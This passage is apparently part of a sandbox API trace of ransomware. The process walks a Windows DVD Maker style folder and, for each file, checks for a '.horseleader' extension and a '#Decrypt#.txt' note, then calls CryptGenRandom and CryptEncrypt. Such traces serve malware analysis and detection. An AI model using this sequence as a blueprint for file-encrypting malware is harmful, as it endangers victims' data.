Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.905] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72669a5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72669a5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553c313d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc57, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-image-inset.png", cAlternateFileName="")) returned 1 [0251.905] lstrcmpiW (lpString1="16_9-frame-image-inset.png", lpString2="Windows") returned -1 [0251.905] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png") returned 81 [0251.905] StrStrIW (lpFirst="16_9-frame-image-inset.png", lpSrch=".horseleader") returned 0x0 [0251.905] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="#Decrypt#.txt") returned 1 [0251.905] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="_uninstalling_.png") returned 1 [0251.905] lstrlenW (lpString=".testttjffg") returned 11 [0251.905] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", lpSrch=".testttjffg") returned 0x0 [0251.905] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.906] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.906] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x213d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0251.906] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0251.906] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png") returned 74 [0251.906] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.906] lstrcmpW (lpString1="btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.906] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.906] lstrlenW (lpString=".testttjffg") returned 11 [0251.906] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.906] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.906] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.907] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0251.907] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0251.907] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png") returned 74 [0251.907] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.907] lstrcmpW (lpString1="btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.907] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.907] lstrlenW (lpString=".testttjffg") returned 11 [0251.907] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", lpSrch=".testttjffg") returned 0x0 [0251.908] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.908] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.909] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x20d6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0251.909] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0251.909] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png") returned 78 [0251.909] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".horseleader") returned 0x0 [0251.909] lstrcmpW (lpString1="btn-previous-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.909] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0251.909] lstrlenW (lpString=".testttjffg") returned 11 [0251.909] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.909] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.909] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.910] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-bullet.png", cAlternateFileName="")) returned 1 [0251.910] lstrcmpiW (lpString1="button-bullet.png", lpString2="Windows") returned -1 [0251.910] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png") returned 72 [0251.910] StrStrIW (lpFirst="button-bullet.png", lpSrch=".horseleader") returned 0x0 [0251.910] lstrcmpW (lpString1="button-bullet.png", lpString2="#Decrypt#.txt") returned 1 [0251.910] lstrcmpW (lpString1="button-bullet.png", lpString2="_uninstalling_.png") returned 1 [0251.910] lstrlenW (lpString=".testttjffg") returned 11 [0251.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", lpSrch=".testttjffg") returned 0x0 [0251.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.911] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0251.911] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.911] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png") returned 75 [0251.911] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.911] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.911] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.911] lstrlenW (lpString=".testttjffg") returned 11 [0251.911] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.911] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.911] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.912] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726dbe73, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726dbe73, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x47c1d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0251.912] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0251.912] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png") returned 77 [0251.912] StrStrIW (lpFirst="content-background.png", lpSrch=".horseleader") returned 0x0 [0251.912] lstrcmpW (lpString1="content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.912] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.912] lstrlenW (lpString=".testttjffg") returned 11 [0251.912] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.912] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.912] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.915] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11276, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="header-background.png", cAlternateFileName="")) returned 1 [0251.915] lstrcmpiW (lpString1="header-background.png", lpString2="Windows") returned -1 [0251.915] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png") returned 76 [0251.915] StrStrIW (lpFirst="header-background.png", lpSrch=".horseleader") returned 0x0 [0251.916] lstrcmpW (lpString1="header-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.916] lstrcmpW (lpString1="header-background.png", lpString2="_uninstalling_.png") returned 1 [0251.916] lstrlenW (lpString=".testttjffg") returned 11 [0251.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", lpSrch=".testttjffg") returned 0x0 [0251.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.916] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3126b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passport.png", cAlternateFileName="")) returned 1 [0251.916] lstrcmpiW (lpString1="passport.png", lpString2="Windows") returned -1 [0251.917] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png") returned 67 [0251.917] StrStrIW (lpFirst="passport.png", lpSrch=".horseleader") returned 0x0 [0251.917] lstrcmpW (lpString1="passport.png", lpString2="#Decrypt#.txt") returned 1 [0251.917] lstrcmpW (lpString1="passport.png", lpString2="_uninstalling_.png") returned 1 [0251.917] lstrlenW (lpString=".testttjffg") returned 11 [0251.917] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", lpSrch=".testttjffg") returned 0x0 [0251.917] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.917] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.917] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7272812d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7272812d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x10e94, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Passport.wmv", cAlternateFileName="")) returned 1 [0251.917] lstrcmpiW (lpString1="Passport.wmv", lpString2="Windows") returned -1 [0251.918] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv") returned 67 [0251.918] StrStrIW (lpFirst="Passport.wmv", lpSrch=".horseleader") returned 0x0 [0251.918] lstrcmpW (lpString1="Passport.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.918] lstrcmpW (lpString1="Passport.wmv", lpString2="_uninstalling_.png") returned 1 [0251.918] lstrlenW (lpString=".testttjffg") returned 11 [0251.918] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", lpSrch=".testttjffg") returned 0x0 [0251.918] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.918] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.918] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x58bf8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="passportcover.png", cAlternateFileName="")) returned 1 [0251.918] lstrcmpiW (lpString1="passportcover.png", lpString2="Windows") returned -1 [0251.918] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png") returned 72 [0251.919] StrStrIW (lpFirst="passportcover.png", lpSrch=".horseleader") returned 0x0 [0251.919] lstrcmpW (lpString1="passportcover.png", lpString2="#Decrypt#.txt") returned 1 [0251.919] lstrcmpW (lpString1="passportcover.png", lpString2="_uninstalling_.png") returned 1 [0251.919] lstrlenW (lpString=".testttjffg") returned 11 [0251.919] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", lpSrch=".testttjffg") returned 0x0 [0251.919] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.919] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.925] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PassportMask.wmv", cAlternateFileName="")) returned 1 [0251.925] lstrcmpiW (lpString1="PassportMask.wmv", lpString2="Windows") returned -1 [0251.925] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv") returned 71 [0251.925] StrStrIW (lpFirst="PassportMask.wmv", lpSrch=".horseleader") returned 0x0 [0251.925] lstrcmpW (lpString1="PassportMask.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.926] lstrcmpW (lpString1="PassportMask.wmv", lpString2="_uninstalling_.png") returned 1 [0251.926] lstrlenW (lpString=".testttjffg") returned 11 [0251.926] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", lpSrch=".testttjffg") returned 0x0 [0251.926] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.926] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.926] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="PassportMask_PAL.wmv", cAlternateFileName="")) returned 1 [0251.926] lstrcmpiW (lpString1="PassportMask_PAL.wmv", lpString2="Windows") returned -1 [0251.926] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv") returned 75 [0251.926] StrStrIW (lpFirst="PassportMask_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.927] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.927] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.928] lstrlenW (lpString=".testttjffg") returned 11 [0251.928] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.928] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 